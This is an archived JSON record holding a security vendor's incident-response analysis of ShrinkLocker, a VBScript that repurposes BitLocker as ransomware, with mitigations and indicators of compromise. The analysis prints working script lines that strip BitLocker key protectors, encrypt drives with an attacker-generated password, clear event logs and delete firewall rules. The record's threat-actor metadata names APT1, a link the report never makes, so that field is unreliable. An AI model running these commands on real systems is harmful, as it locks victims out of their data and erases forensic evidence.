{
	"id": "30982f38-7604-4e0f-af1c-0cc19ea36226",
	"created_at": "2026-04-06T03:36:18.761656Z",
	"updated_at": "2026-04-10T13:11:18.29061Z",
	"deleted_at": null,
	"sha1_hash": "d79320b8706e8177886fea61b65a120fcd9baa77",
	"title": "ShrinkLocker: Turning BitLocker into ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 900042,
	"plain_text": "ShrinkLocker: Turning BitLocker into ransomware\r\nBy Cristian Souza\r\nPublished: 2024-05-23 · Archived: 2026-04-06 03:31:20 UTC\r\nIntroduction\r\nAttackers always find creative ways to bypass defensive features and accomplish their goals. This can be done\r\nwith packers, crypters, and code obfuscation. However, one of the best ways of evading detection, as well as\r\nmaximizing compatibility, is to use the operating system’s own features. In the context of ransomware threats, one\r\nnotable example is leveraging exported functions present in the cryptography DLL ADVAPI32.dll, such as\r\nCryptAcquireContextA, CryptEncrypt, and CryptDecrypt. In this way, the adversaries can make sure that the\r\nmalware can run and simulate normal behavior in various versions of the OS that support this DLL.\r\nAlthough this seems smart enough, another clever technique caught our attention in a recent incident response\r\nengagement: using the native BitLocker feature to encrypt entire volumes and stealing the decryption key. The\r\noriginal purpose of BitLocker is to address the risks of data theft or exposure from lost, stolen, or improperly\r\ndecommissioned devices. Nonetheless, threat actors have found out that this mechanism can be repurposed for\r\nmalicious ends to great effect.\r\nIn that incident, the attackers were able to deploy and run an advanced VBS script that took advantage of\r\nBitLocker for unauthorized file encryption. We spotted this script and its modified versions in Mexico, Indonesia,\r\nand Jordan. In the sections below, we analyze in detail the malicious code obtained during our incident response\r\neffort and provide tips for mitigating this kind of threat.\r\nThis is not the first time we have seen BitLocker used for encrypting drives and demanding a ransom. Previously,\r\nattackers used this Microsoft utility to encrypt critical systems after accessing and controlling these. 
In this case,\r\nhowever, the adversary took additional steps to maximize the damage from the attack and hinder an effective\r\nresponse to the incident.\r\nVBScript analysis\r\nOne interesting fact is that the attackers did not bother to obfuscate the bulk of the code, as threat actors typically\r\ndo. The most plausible explanation for this is that they already had full control of the target system when the script\r\nwas executed. It is stored at C:\\ProgramData\\Microsoft\\Windows\\Templates\\ as Disk.vbs. Its first lines contain\r\na function that converts a string to its binary representation using an ADODB.Stream object. This function is later\r\nused for encoding data to be sent in an HTTP POST request.\r\nhttps://securelist.com/ransomware-abuses-bitlocker/112643/\r\nPage 1 of 15\n\nStream_StringToBinary function\r\nThe first step by the main function of the script is to use Windows Management Instrumentation (WMI) to query\r\ninformation about the operating system with the help of the Win32_OperatingSystem class. For each object\r\nwithin the query results, the script checks if the current domain is different from the target. If it is, the script\r\nfinishes automatically. After that, it checks if the name of the operating system contains “xp”, “2000”, “2003”, or\r\n“vista”, and if the Windows version matches any one of these, the script finishes automatically and deletes itself.\r\nInitial conditions for execution\r\nAfter that, the script continues to rely on WMI for querying information about the OS. It then performs disk\r\nresizing operations, which may vary with the result of the OS version check. These operations are performed\r\nsolely on fixed drives (DriveType = 3). 
The following drive types typically exist in a file system:\r\n$DriveType_map = @{\r\n0 = 'Unknown'\r\n1 = 'No Root Directory'\r\n2 = 'Removable Disk'\r\n3 = 'Local Disk'  # This is the DriveType searched by the malware.\r\n4 = 'Network Drive'\r\n5 = 'Compact Disc'\r\n6 = 'RAM Disk'\r\n}\r\nThe likely reason the malware does not try to perform the same operations on network drives (DriveType = 4) is to\r\navoid triggering detection tools on the network.\r\nTo resize local drives in Windows Server 2008 or 2012, the script checks the primary boot partition and saves this\r\ninformation. It saves the index of the different partitions and then performs the following actions using diskpart:\r\nShrink the size of each non-boot partition by 100 MB. This creates 100 MB of unallocated space in each\r\npartition other than the boot volume;\r\nSplit the unallocated space into new 100 MB primary partitions;\r\nFormat the partitions with the override option, which forces the volume to dismount first if necessary, and\r\nassigns a file system and a drive letter to each;\r\nActivate the partitions;\r\nIf the shrink procedure was successful, save “ok” as a variable, so the script can continue.\r\nDisk resizing operations performed by the script in Windows Server 2008 and 2012\r\nIf the operation is successful, the code uses the utility bcdboot and the drive letter saved previously as a boot\r\nvolume to reinstall the boot files on the new primary partitions.\r\nBoot files reinstall\r\nThe partition shrink operations for other OS versions are similar but implemented with a different piece of code\r\nfor compatibility reasons. 
The example below shows the process as applied to the Windows versions 7, 8, and 8.1.\r\nDisk resizing operations in the Windows versions 7, 8, or 8.1\r\nFor Windows 2008 or 7, after the partition shrink procedure finishes, the variable matchedDrives saves the drive\r\nletters separated by commas, but only if the file system is NTFS, exFAT, FAT32, ReFS, or FAT. The code was\r\nmodified to print an example:\r\nmatchedDrives variable data\r\nThe script then adds the following registry entries:\r\nfDenyTSConnections = 1: disables RDP connections;\r\nscforceoption = 1: enforces smart card authentication;\r\nUseAdvancedStartup = 1: requires the use of the BitLocker PIN for pre-boot authentication;\r\nEnableBDEWithNoTPM = 1: allows BitLocker without a compatible TPM chip;\r\nUseTPM = 2: allows the use of TPM if available;\r\nUseTPMPIN = 2: allows the use of a startup PIN with TPM if available;\r\nUseTPMKey = 2: allows the use of a startup key with TPM if available;\r\nUseTPMKeyPIN = 2: allows the use of a startup key and PIN with TPM if available;\r\nEnableNonTPM = 1: allows BitLocker without a compatible TPM chip, requires a password or startup key\r\non a USB flash drive;\r\nUsePartialEncryptionKey = 2: requires the use of a startup key with TPM;\r\nUsePIN = 2: requires the use of a startup PIN with TPM.\r\nIf the script detects an error, it restarts the system.\r\nRegistry modifications\r\nBy analyzing the malware dynamically, we can confirm the registry changes performed:\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\FVE\\UseTPMPIN: 0x00000002\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\FVE\\UseTPMKey: 0x00000002\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\FVE\\UseTPMKeyPIN: 0x00000002\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\FVE\\EnableNonTPM: 
0x00000001\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\FVE\\UsePartialEncryptionKey: 0x00000002\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\FVE\\UsePIN: 0x00000002\r\nHKLM\\SOFTWARE\\WOW6432Node\\Policies\\Microsoft\\FVE\\UseAdvancedStartup: 0x00000001\r\nHKLM\\SOFTWARE\\WOW6432Node\\Policies\\Microsoft\\FVE\\EnableBDEWithNoTPM: 0x00000001\r\nHKLM\\SOFTWARE\\WOW6432Node\\Policies\\Microsoft\\FVE\\UseTPM: 0x00000002\r\nHKLM\\SOFTWARE\\WOW6432Node\\Policies\\Microsoft\\FVE\\UseTPMPIN: 0x00000002\r\nHKLM\\SOFTWARE\\WOW6432Node\\Policies\\Microsoft\\FVE\\UseTPMKey: 0x00000002\r\nHKLM\\SOFTWARE\\WOW6432Node\\Policies\\Microsoft\\FVE\\UseTPMKeyPIN: 0x00000002\r\nHKLM\\SOFTWARE\\WOW6432Node\\Policies\\Microsoft\\FVE\\EnableNonTPM: 0x00000001\r\nHKLM\\SOFTWARE\\WOW6432Node\\Policies\\Microsoft\\FVE\\UsePartialEncryptionKey: 0x00000002\r\nHKLM\\SOFTWARE\\WOW6432Node\\Policies\\Microsoft\\FVE\\UsePIN: 0x00000002\r\nInterestingly enough, there are several functions performing these operations, each designed for a different version\r\nof Windows. In some conditionals, it checks if BitLocker Drive Encryption Tools are active through the ID 266 of\r\nRemote Server Administration Tools. The malware then checks if the BitLocker Drive Encryption Service\r\n(BDESVC) is running. If not, it starts the service.\r\nBDESVC verification\r\nThe script also changes the label of the new boot partitions to the attacker’s email as shown in the images below,\r\nso the victim can contact them.\r\nDrive label modification\r\nAttacker’s email as a drive label\r\nAfter that, the malware disables the protectors used to secure BitLocker’s encryption key and deletes them. The\r\ndeletion method may vary depending on the version of the OS. 
In a Windows Server 2008 or Windows 7 scenario,\r\nthis is accomplished via VBS features, after which the script uses PowerShell to force the deletion of the\r\nprotectors.\r\nHaving completed the deletion, it enables the use of a numerical password as a protector and the encryption\r\nfeature.\r\nProtectors deletion\r\nThe reason for deleting the default protectors is to avoid the recovery of the keys by the user, as in the example\r\nbelow.\r\nThe recovery of BitLocker keys\r\nAs the next step, the 64-character encryption key is generated by the malware using a random multiplication and\r\nreplacement of the following elements:\r\nA variable with the numbers 0–9;\r\nThe famous pangram, “The quick brown fox jumps over the lazy dog”, in lowercase and uppercase, which\r\ncontains every letter of the English alphabet;\r\nSpecial characters.\r\nThe randomness of this password is accomplished by a seed made of various elements of the affected system, such\r\nas used memory and network statistics. Later, this information is sent to the attacker. 
We tested the key generation\r\nlogic in our environment, and with a slight modification of the script, we were able to see the generated password.\r\nKey generation process\r\nThe code then converts the previously generated encryption key to a secure string—a PowerShell option that\r\nprevents creating a string object in memory—and effectively enables BitLocker on the drives.\r\nIf Len((CreateObject(\"WScript.Shell\").Exec(\"powershell.exe -Command \"\"$protectors = (Get-BitLockerVolume -MountPoint \" \u0026 drives(i) \u0026 \").KeyProtector; if ($protectors -ne $null) { foreach ($protector in $protectors) { Remove-BitLockerKeyProtector -MountPoint \" \u0026 drives(i) \u0026 \" -KeyProtectorId $protector.KeyProtectorId } }\"\"\")).stdout.readall) \u003e 0 Then: End If\r\nIf Len((CreateObject(\"WScript.Shell\").Exec(\"powershell.exe -Command $a=ConvertTo-SecureString \" \u0026 Chr(34) \u0026 Chr(39) \u0026 strRandom \u0026 Chr(39) \u0026 Chr(34) \u0026 \" -asplaintext -force;Enable-BitLocker \" \u0026 drives(i) \u0026 \" -s -qe -pwp -pw $a\")).stdout.readall) \u003e 0 Then: End If\r\nIf Len((CreateObject(\"WScript.Shell\").Exec(\"powershell.exe -Command Resume-BitLocker -MountPoint \" \u0026 drives(i) \u0026 \" \")).stdout.readall) \u003e 0 Then: End If\r\nThe script then creates an HTTP POST request object using the following options:\r\nUse WinHTTP version 5.1.\r\nAccept the French language.\r\nIgnore SSL errors (httpRequest.Option(4) = 13056 → WinHttpRequestOption_SslErrorIgnoreFlags).\r\nDisable redirects (httpRequest.Option(6) = false → WinHttpRequestOption_EnableRedirects).\r\nThe attackers used the domain trycloudflare.com to obfuscate their real address. This domain is legitimate; it\r\nbelongs to Cloudflare and is used to provide quick tunnels for developers. 
The subdomain configured by the\r\nattackers was scottish-agreement-laundry-further.\r\nRequest creation\r\nThe malware also includes information about the machine and the generated password as a payload for the POST\r\nrequest, as shown in the image below.\r\nInformation to be sent in the POST request\r\nThe script also contains a loop that tries to send the information to the attacker five times if an error occurs.\r\nRetry procedure\r\nWith some tweaks, we were able to print the data being sent to the attacker, as shown in the image below. Note\r\nthat the data includes the computer name, Windows version, drives affected, and the password string.\r\nThe victim’s IP address will also be logged on the attacker’s server, allowing them to track each\r\nvictim.\r\nInformation to be sent\r\nAfter removing the BitLocker protectors and configuring drive encryption, the script goes through the following\r\nsteps to cover its tracks.\r\nIt validates if the hostname is the target of this malware, then deletes the files:\r\n\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\MACHINE\\Preferences\\ScheduledTasks\\ScheduledTasks.xml\r\n\\scripts\\Login.vbs\r\n\\scripts\\Disk.vbs\r\nC:\\ProgramData\\Microsoft\\Windows\\Templates\\Disk.vbs\r\nDelete operations\r\nThe script then clears the Windows PowerShell and Microsoft-Windows-PowerShell/Operational logs with\r\nwevtutil. It turns on the system firewall and deletes all of its rules. It also deletes the tasks VolumeInit and\r\nVolumeCheck. 
Finally, the malware performs a forced shutdown.\r\nIf Len((CreateObject(\"WScript.Shell\").Exec(\"wevtutil cl \"\"Windows PowerShell\"\"\")).stdout.readall) \u003e 0 Then: End If\r\nIf Len((CreateObject(\"WScript.Shell\").Exec(\"wevtutil cl \"\"Microsoft-Windows-PowerShell/Operational\"\"\")).stdout.readall) \u003e 0 Then: End If\r\nIf Len((CreateObject(\"WScript.Shell\").Exec(\"netsh advfirewall set allprofiles state on\")).stdout.readall) \u003e 0 Then: End If\r\nIf Len((CreateObject(\"WScript.Shell\").Exec(\"netsh advfirewall firewall delet rule name=all\")).stdout.readall) \u003e 0 Then: End If\r\nIf Len((CreateObject(\"WScript.Shell\").Exec(\"schtasks /Delete /TN \"\"VolumeInit\"\" /F\")).stdout.readall) \u003e 0 Then: End If\r\nIf Len((CreateObject(\"WScript.Shell\").Exec(\"schtasks /Delete /TN \"\"VolumeCheck\"\" /F\")).stdout.readall) \u003e 0 Then: End If\r\nAfter the shutdown, the victim will see the BitLocker screen. If the user tries to use the recovery options, they will\r\nsee nothing but the message, “There are no more BitLocker recovery options on your PC”.\r\nBitLocker recovery screen\r\nTactics, techniques and procedures\r\nThe analysis showed that this threat actor has an extensive understanding of the VBScript language and of Windows\r\ninternals and utilities, such as WMI, diskpart, and bcdboot. 
Below are the TTPs identified for this scenario.\r\nTactic | Technique | ID\r\nExecution | Command and Scripting Interpreter: Visual Basic | T1059.005\r\nExecution | Windows Management Instrumentation | T1047\r\nExecution | Command and Scripting Interpreter: PowerShell | T1059.001\r\nImpact | Data Encrypted for Impact | T1486\r\nImpact | System Shutdown/Reboot | T1529\r\nDefense Evasion | Clear Windows Event Logs | T1070.001\r\nDefense Evasion | Modify Registry | T1112\r\nDefense Evasion | Disable or Modify System Firewall | T1562.004\r\nExfiltration | Exfiltration Over Web Service | T1041\r\nArtifacts and digital forensics\r\nAs the local activity performed by the script includes cleaning up its traces, clearing some logs and the tasks\r\ncreated for execution, and finally, encrypting the whole drive, it was not easy to get forensic artifacts to identify\r\nthe malicious activities and to find opportunities for decryption.\r\nFortunately, some of the script content and commands executed were registered and logged by a third-party\r\nservice, and these were collected for analysis. This allowed us to obtain the secure strings to which the encryption\r\nkeys were converted from some of the affected systems.\r\nSecure strings obtained\r\nElsewhere, we attempted to collect network logs where the POST requests to the C2 were stored. However, the\r\nmost common configuration for web activity logging includes GET but unfortunately not POST requests.\r\nWe did finally obtain the POST requests, but this was very challenging. 
The case provides justification for logging\r\nPOST traffic and ensuring that all critical system activity is forwarded to a central repository with enough space\r\nfor storing data for the recommended retention period (six or more months) to avoid losing evidence after\r\nattackers remove all their traces from the individual systems.\r\nFinally, some systems in the customer’s infrastructure remained unencrypted and were considered unaffected at\r\nfirst. However, we later found out that they had, in fact, been affected, but BitLocker was not configured in these\r\nsystems. This made it possible for us to obtain the script itself, analyze its behavior and collect further evidence.\r\nRecovery\r\nWhile we could obtain some of the passphrases and fixed values implemented by the threat actor to create the\r\nencryption keys, the script includes some variable values, and those are different for each affected system,\r\nmaking the decryption process difficult.\r\nNetwork information collected for use in the seed\r\nMitigations\r\nCompanies are encouraged to use BitLocker or other encryption tools (such as VeraCrypt) to protect corporate\r\nsecrets. However, a few precautions must be taken to avoid abuse by attackers.\r\nUse a robust, properly configured EPP solution to detect threats that try to abuse BitLocker;\r\nImplement Managed Detection and Response (MDR) to proactively scan for threats;\r\nIf BitLocker is enabled, make sure you are using a strong password and have the recovery keys stored in a\r\nsecure location;\r\nEnsure that users have only minimal privileges. This way, they cannot enable encryption features or change\r\nregistry keys on their own;\r\nEnable network traffic logging and monitoring. Configure the logging of both GET and POST requests. 
In\r\ncase of infection, the requests made to the attacker’s domain may contain passwords or keys;\r\nMonitor for events associated with VBS execution and PowerShell, and save the logged scripts and\r\ncommands to an external repository storing activity that may be deleted locally;\r\nMake backups frequently, store them offline, and test them.\r\nIf you need assistance with the investigation of a ransomware attack and recovering encrypted data, please contact us\r\nat gert@kaspersky.com.\r\nConclusion\r\nOur incident response and malware analysis are evidence that attackers are constantly refining their tactics to\r\nevade detection. In this incident, we observed the abuse of the native BitLocker feature for unauthorized data\r\nencryption. The VBS script demonstrates that the malicious actor involved in this attack has an excellent\r\nunderstanding of Windows internals. Although the script analysis was not complicated at all, this kind of threat is\r\ndifficult to detect, since unique strings inside the artifact can be easily modified to bypass YARA rules. 
Therefore,\r\nthe best detection method in scenarios like these is behavioral analysis, which correlates different actions\r\nperformed by the application to reach a verdict.\r\nKaspersky products detect the threat described in this article with the following verdicts:\r\nTrojan.VBS.SAgent.gen;\r\nTrojan-Ransom.VBS.BitLock.gen;\r\nTrojan.Win32.Generic.\r\nIndicators of compromise\r\nURLs:\r\nhxxps://scottish-agreement-laundry-further[dot]trycloudflare[dot]com/updatelog\r\nhxxps://generated-eating-meals-top[dot]trycloudflare.com/updatelog\r\nhxxps://generated-eating-meals-top[dot]trycloudflare.com/updatelogead\r\nhxxps://earthquake-js-westminster-searched[dot]trycloudflare.com:443/updatelog\r\nE-mail addresses:\r\nonboardingbinder[at]proton[dot]me\r\nconspiracyid9[at]protonmail[dot]com\r\nMD5 hashes:\r\n842f7b1c425c5cf41aed9df63888e768\r\nSource: https://securelist.com/ransomware-abuses-bitlocker/112643/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://securelist.com/ransomware-abuses-bitlocker/112643/"
	],
	"report_names": [
		"112643"
	],
	"threat_actors": [
		{
			"id": "cf7fc640-acfe-41c4-9f3d-5515d53a3ffb",
			"created_at": "2023-01-06T13:46:38.228042Z",
			"updated_at": "2026-04-10T02:00:02.883048Z",
			"deleted_at": null,
			"main_name": "APT1",
			"aliases": [
				"PLA Unit 61398",
				"Comment Crew",
				"Byzantine Candor",
				"Comment Group",
				"GIF89a",
				"Group 3",
				"TG-8223",
				"Brown Fox",
				"ShadyRAT",
				"G0006",
				"COMMENT PANDA"
			],
			"source_name": "MISPGALAXY:APT1",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775446578,
	"ts_updated_at": 1775826678,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d79320b8706e8177886fea61b65a120fcd9baa77.pdf",
		"text": "https://archive.orkl.eu/d79320b8706e8177886fea61b65a120fcd9baa77.txt",
		"img": "https://archive.orkl.eu/d79320b8706e8177886fea61b65a120fcd9baa77.jpg"
	}
}